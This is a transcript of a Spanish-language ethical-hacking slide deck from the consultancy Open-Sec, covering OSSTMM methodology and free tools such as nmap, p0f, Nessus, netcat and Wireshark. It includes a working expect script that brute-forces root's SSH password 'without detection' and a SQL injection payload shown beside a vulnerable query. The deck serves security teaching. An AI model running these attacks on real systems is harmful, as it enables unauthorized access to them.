Ethical Hacking Con Software Libre

65
www.Open-Sec.com ETHICAL HACKING Walter Cuestas, CEH Gerente General [email protected] Carlos Renzo Gerente de Proyectos [email protected] Mauricio Urizar Consultor Senior [email protected] http://www.open-sec.com

Transcript of Ethical Hacking Con Software Libre

Page 1: Ethical Hacking Con Software Libre

www.Open-Sec.com

ETHICAL HACKING

Walter Cuestas, CEHGerente [email protected]

Carlos RenzoGerente de [email protected]

Mauricio UrizarConsultor [email protected]

http://www.open-sec.com

Page 2: Ethical Hacking Con Software Libre

www.Open-Sec.com

Por qué Open-Sec ?

Unico partner de Digium en Perú y Ecuador y uno de los 6 partners en Latino América.

Consultores expertos en Comunicaciones Unificadas. Consultores expertos en Soluciones de Telefonía VoIP.

Consultores expertos en seguridad VoIP. Open-Sec entrega 1 AÑO DE SOPORTE DIRECTO DE

DIGIUM.

Unica empresa en Perú que cuenta con consultores certificados como Certified Ethical Hacker por EC Council, la certificación de más prestigio a nivel internacional en ethical hacking.

Nuestros consultores saben como atacar y defender. En el 2007, Open-Sec realizó el 80% de los procesos de Ethical Hacking en

Perú.

Unica empresa peruana afiliada a ISECOM, orgaización líder en Seguridad de la Información y Seguridad Informática a nivel mundial.

Unica empresa en Perú que aplica la metodología OSSTMM (Open Source SecureTesting Methodology).

Los resultados de las evaluaciones que realizamos pueden ser validados ante ISECOM.

Pioneros en consultorías respecto a la NTP 17799

Las instalaciones más grandes en Perú se basan en SuSE Linux (Poder Judicial, BBVA).

Open-Sec entrega soporte a estas instalaciones mediante consultores expertos y certificados.

Miembros del proyecto OpenSUSE

Page 3: Ethical Hacking Con Software Libre

www.Open-Sec.com

Quiénes somos ?

•Un Equipo de Consultores con experiencia en organizaciones corporativas, estatales y privadas en

∙ Ethical Hacking∙ Computación Forense∙ Aseguramiento∙ Voz sobre IP∙ Seguridad de la Información

Page 4: Ethical Hacking Con Software Libre

www.Open-Sec.com

Principales Clientes de Open-Sec

Seguridad Informática Seguridad de la Información

Linux y Open Source

Estudio CaballeroBustamante

Page 5: Ethical Hacking Con Software Libre

Qué dicen las estadísticas ?

Conocimientotécnicorequerido

Sofisticación de las herramientas de los atacantes

Manipulación dePaquetes / Spoofing

19901980

AdivinarPasswords

Programasautoreplicados

Password Cracking

Explotación devulnerabilidadesconocidas Deshabilitar

auditorías

Back Doors

Sweepers

Sniffers

Análisis “Ocultos”

Alto

Bajo 2000+

DDoS

Gusanos enInternet

O-day exploits

Page 6: Ethical Hacking Con Software Libre

www.Open-Sec.com

Seguridad de la Información

Page 7: Ethical Hacking Con Software Libre

www.Open-Sec.com

Seguridad es el No. 2.

Por qué está en el mundo de los negocios?

Es la seguridad SU negocio?

Sí no, qué esta protegiendo Ud.?

Puede contarlo ? Tiene un valor?

Por qué usan computadoras ?

Productividad, eficiencia, costos Riéndose con un amigo de las fotos corporativas que 

encontró en su red wireless

Admin borrando logs después de bajar películas toda la 

ncohe

Re­envia correos de su jefe a un reportero aún cuando ella no tiene derechos para 

ello

Vende lapiceros y toner por Internet, los 

“toma” del trabajo

Cambiando las fechas en los registros de 

impuestos antes de una audotoría

Page 8: Ethical Hacking Con Software Libre

www.Open-Sec.com

Qué es seguridad ???

Proteger la información de un amplio espectro de amenazas, a efectos de asegurar la continuidad del negocio, minimizar los daños a la organización y maximizar el retorno de inversiones y las oportunidades del negocio.

Asegurar que los recursos del sistema de información (material informático o programas) de una organización sean utilizados de la manera que se decidió..

Seguridad de la Información

Seguridad Informática

Page 9: Ethical Hacking Con Software Libre

www.Open-Sec.com

ExploitsDa

orígen a

Conducea

PuedeDañar

YCausar

un

Que generala aplicación de medidas de

Afectadirectamente

ActivoExposure

Agente de Amenaza

Amenaza

Vulnerabilidad

Protección

Debilidades que puedenproveer de accesono autorizado a

los recursos

Cualquier daño potencial a los sistemas de información

Probabilidad que un Agente de

Amenaza explote una vulnerabilidad

Riesgo

Actúa en las Amenazas

Actúa en las Amenazas

Instancia en que es

expuesto a perdidas debido al Agente de Amenaza

Amenazas, vulnerabilidades & riesgos

Page 10: Ethical Hacking Con Software Libre

www.Open-Sec.com

Ethical Hacking ....

Page 11: Ethical Hacking Con Software Libre

www.Open-Sec.com

“Hackeando” ?

www.open­sec.com

Page 12: Ethical Hacking Con Software Libre

www.Open-Sec.com

Nuestros “hackers”...

Page 13: Ethical Hacking Con Software Libre

www.Open-Sec.com

Los REALES...

Page 14: Ethical Hacking Con Software Libre

www.Open-Sec.com

Ellos las prefieren GORDAS...?

Page 15: Ethical Hacking Con Software Libre

www.Open-Sec.com

Wow! Tengo que aprender mucho!

Page 16: Ethical Hacking Con Software Libre

www.Open-Sec.com

No tanto...Uds ya son “viejos”....

Page 17: Ethical Hacking Con Software Libre

www.Open-Sec.com

Vulnerabilidades Frecuentes

Cliente

Remoto

0.Ausencia de SPPPG.1.Configuración no decuada de router.2.RAS no asegurado ni monitoreado.3.Fuga de información.4.Servicios innecesarios.5.Passwords débiles.6.Cuentas con demasiado privilegio.7.Servicios Internet mal configurados.8.Firewall mal configurado.9.Ausencia de parches o configuración default.10.Derechos excesivos sobre recursos.11.Excesivas relaciones de confianza.12.Servicios no autenticados/autorizados.13.Ausencia de IDPS(NIPDS,NNIPDS,HIDPS).

Router

Internet

RAS

Oficina

Remota

Firewall

Router

Interno

DMZIDPS

VLAN1

Red Interna

VLAN2

Page 18: Ethical Hacking Con Software Libre

www.Open-Sec.com

Estudios y Certificaciones, se requieren ?

Page 19: Ethical Hacking Con Software Libre

www.Open-Sec.com

EL HACKING 

ES UN ARTE LA EVALUACIÓN

 DESEGURIDAD

ES UNACIENCIA

Page 20: Ethical Hacking Con Software Libre

www.Open-Sec.com

No se requiere tan poco como esto...

Page 21: Ethical Hacking Con Software Libre

www.Open-Sec.com

Perotampocotantocomo esto....

Page 22: Ethical Hacking Con Software Libre

www.Open-Sec.com

Se requiere una metodología...

Obtención de Información y Footprinting

Trofeo

Evidencia

Borrado de

Rastros

Escalamiento de PrivilegiosObtención

de

Acceso

Análisis

de

Vulnerabilidades

Scanning

y

Enumeración

Footprint

Page 23: Ethical Hacking Con Software Libre

www.Open-Sec.com

Peromejoruna de VERDAD, ESTANDARIZADA,DOCUMENTADA,MANTENIDA,ACEPTADA, CERTIFICABLE

www.open­sec.com

Page 24: Ethical Hacking Con Software Libre

www.Open-Sec.com

OSSTMM :Metodología

Cuantificable

Page 25: Ethical Hacking Con Software Libre

www.Open-Sec.com

A qué ayuda OSSTMM ? A pasar del caos (desorden sin resultado positivo) y la frustración ...

Page 26: Ethical Hacking Con Software Libre

www.Open-Sec.com

... a solamente esperar por los resultados...bueno, es un decir...

Page 27: Ethical Hacking Con Software Libre

www.Open-Sec.com

Análisis de Vulnerabilidad versus Pruebas de Penetración

Herramientas automatizadas versus “Análisis a pulso”

Page 28: Ethical Hacking Con Software Libre

www.Open-Sec.com

Ejemplo de Vulnerabilidad Confirmada

Page 29: Ethical Hacking Con Software Libre

www.Open-Sec.com

Revisión de la Inteligencia Competitiva

Sólo un ejemplo de OSSTMM, entonces, ...

Page 30: Ethical Hacking Con Software Libre

www.Open-Sec.com

Las Herramientas....

Page 31: Ethical Hacking Con Software Libre

www.Open-Sec.com

HerramientaNro 1

Page 32: Ethical Hacking Con Software Libre

www.Open-Sec.com

Page 33: Ethical Hacking Con Software Libre

www.Open-Sec.com

Page 34: Ethical Hacking Con Software Libre

www.Open-Sec.com

Page 35: Ethical Hacking Con Software Libre

www.Open-Sec.com

Page 36: Ethical Hacking Con Software Libre

www.Open-Sec.com

Page 37: Ethical Hacking Con Software Libre

www.Open-Sec.com

Muchas veces tendrán que compilar...

Page 38: Ethical Hacking Con Software Libre

www.Open-Sec.com

Casi siempre requerirán acceso tipo root...aunque algunas tienen su versión para MS Windows...nadie es perfecto :(

Page 39: Ethical Hacking Con Software Libre

www.Open-Sec.com

   Herramienta Nro 2 : NMAP (Network MAPper)

Page 40: Ethical Hacking Con Software Libre

www.Open-Sec.com

NMAP­FENMAP CLI

Page 41: Ethical Hacking Con Software Libre

www.Open-Sec.com

nmap -P0 -v -oA archivo_log direccion_ipnmap -sR -A -P0 -v -oN archivo_log direccion_ip

Las más usadas :

www.insecure.org

Page 42: Ethical Hacking Con Software Libre

www.Open-Sec.com

PASSIVE OS fingerprint scanning

Conexiones entrantes p0f

Conexiones salientesp0f -A -S -M-A SYN/ACK-S mostrar incluso firmas conocidas-M detectar NAT

192.165.38.73:20908 - OpenBSD 3.0-3.4 (up: 836 hrs) -> 217.8.32.51:80 (distance 6, link: GPRS or FreeS/WAN) 192.165.38.73:21154 - Linux 2.4/2.6 (NAT!) (up: 173 hrs) -> 217.8.32.51:80 (distance 6, link: GPRS or FreeS/WAN) 192.165.38.73:22003 - Windows XP Pro SP1, 2000 SP3 (NAT!) -> 217.8.32.51:80 (distance 6, link: GPRS or FreeS/WAN)

>> Masquerade at 192.165.38.73: indicators at 69%.

Page 43: Ethical Hacking Con Software Libre

www.Open-Sec.com

Herramienta Nro 3

Con la versión 3, ir a http://www.openvas.org/doku.php

www.nessus.org

Page 44: Ethical Hacking Con Software Libre

www.Open-Sec.com

Instalación de Nessus :

• Servidor v3– Seleccionar “Nessus 3.0.6 for Linux”.– Registrarse para envió de código de activación– Descargar archivo según distribución linux

• Nessus-3.0.6-suse10.0.i586.rpm• Disponible para todos los sistemas Unix

– Instalar archivo descargado.

Page 45: Ethical Hacking Con Software Libre

www.Open-Sec.com

Ejecución del cliente :

#nessus &

Page 46: Ethical Hacking Con Software Libre

www.Open-Sec.com

NessConnect : El mejor cliente de Nessus...

Page 47: Ethical Hacking Con Software Libre

www.Open-Sec.com

VulnerabilidadesaniveldeAplicaciones

Page 48: Ethical Hacking Con Software Libre

www.Open-Sec.com

Herramienta Nro. 4 : wikto

http://www.sensepost.com/research/wikto/

Page 49: Ethical Hacking Con Software Libre

www.Open-Sec.com

Varios en uno solo : Spider, Fingerprint, Wikto, Googler

Page 50: Ethical Hacking Con Software Libre

www.Open-Sec.com

Herramienta Nro 5

NetCat

        /\_/\       / 0 0 \   ====v====       \  W  /       |     |     _       / ___ \    /      / /   \ \  |     (((­­­­­)))­'      /     (      ___      \__.=|___E             /

http://netcat.sourceforge.net/

Page 51: Ethical Hacking Con Software Libre

www.Open-Sec.com

Page 52: Ethical Hacking Con Software Libre

www.Open-Sec.com

Page 53: Ethical Hacking Con Software Libre

www.Open-Sec.com

Herramientas Nro 6

Simples Scripts#!/usr/bin/expect -f## simple expect exploit to brute force root's password via ssh without# detection.. see CLABS200101 for info on this exploit.## this is beerware, just buy me a beer at defcon if you like this.# build your own dictionary, use at your own risk, no warranty, etc.## [email protected] january, 2001#

set timeout 3set target [lindex $argv 0]set dictionary [lindex $argv 1]

if {[llength $argv] != 2} { puts stderr "Usage: $argv0 root@target dictionary\n" exit }

set tryPass [open $dictionary r]

foreach passwd [split [read $tryPass] "\n"] { spawn ssh $target expect ":" send "$passwd\n" expect "#" { puts "password is $passwd\n" ; exit } set id [exp_pid] exec kill -INT $id}#www.hack.co.za

Page 54: Ethical Hacking Con Software Libre

www.Open-Sec.com

Herramienta Nro 7Wireless Hacking : Kismet

www.open­sec.com

Page 55: Ethical Hacking Con Software Libre

www.Open-Sec.com

Herramienta Nro 8Secuestro de Sesiones y Más!

www.open­sec.com

Page 56: Ethical Hacking Con Software Libre

www.Open-Sec.com

Herramienta Nro 9SQL Injection – La Moda

www.open­sec.com

' or 1=1­­

sql = "SELECT * FROM users WHERE username = '" + username + "' AND userpass = '" + password + "'"

SELECT * FROM users WHERE username = '' or 1=1--' AND userpass =''

Page 57: Ethical Hacking Con Software Libre

www.Open-Sec.com

Herramienta Nro 10Apelando a la inocencia...

www.open­sec.com

Page 58: Ethical Hacking Con Software Libre

www.Open-Sec.com

Hacking VoIP

Políticas y Procedimientos

Seguridad del Sistema Operativo

Seguridad Servicios Complementarios

(web, DHCP, bases de datos)

Seguridad de la Red (IO,TCP,UDP)

Seguridad Física

Buffer overflow, configuración débil,

DoS, gusanos

Fraude de llamadas, fuzzing,

INVITE/BYE/CANCEL floods, call hijacking,

call eavesdropping, modificación de llamadas

Passwords débiles en el correo

de voz, abuso de larga distancia

Servidor expuesto, DoS, Reboot

SYN flooding, ICMP unreacheable,

DDoS

SQL Injection, saturación de DHCP

Seguridad del protocol

VoIP y Aplicaciones

Page 59: Ethical Hacking Con Software Libre

www.Open-Sec.com

Asterisk

Scanning

The 65527 ports scanned but not shown below are in state: closed)

PORT STATE SERVICE

111/udp open|filtered rpcbind

631/udp open|filtered unknown

694/udp open|filtered unknown

2727/udp open|filtered unknown

4520/udp open|filtered unknown

4569/udp open|filtered unknown IAX

5060/udp open|filtered sip SIP

5353/udp open|filtered unknown

32768/udp open|filtered omad

Page 60: Ethical Hacking Con Software Libre

www.Open-Sec.com

Herramienta 11 : Wireshark !!!

+ VoMIT + waveplayer

Page 61: Ethical Hacking Con Software Libre

www.Open-Sec.com

Herramienta 12 : SiVuSRequest­Line: REGISTER sip:10.1.101.99 SIP/2.0

     Method: REGISTER

     Resent Packet: False

 Message Header

     Via: SIP/2.0/UDP 10.1.101.99:5060;

      branch=83c598e0­6fce­4414­afdd­11a8acd30527

     From: 4000 <sip:[email protected]>;

      tag=83c5ac5c­6fce­4414­80ce­de7720487e25

      To: 4000 <sip:[email protected]>

      Call­ID: 83c5baaa­6fce­4414­8ff6­f57c46985163

      CSeq: 1 REGISTER

      Max­Forwards: 70

      Contact: *

      Expires: 0

      Content­Length: 0

Page 62: Ethical Hacking Con Software Libre

www.Open-Sec.comwww.open­sec.com

Page 63: Ethical Hacking Con Software Libre

www.Open-Sec.com

Page 64: Ethical Hacking Con Software Libre

www.Open-Sec.com

Sóloelcieloesellímite...

www.open­sec.com

Page 65: Ethical Hacking Con Software Libre

www.Open-Sec.com

DEFCON

No hay victimas, SOLO VOLUNTARIOS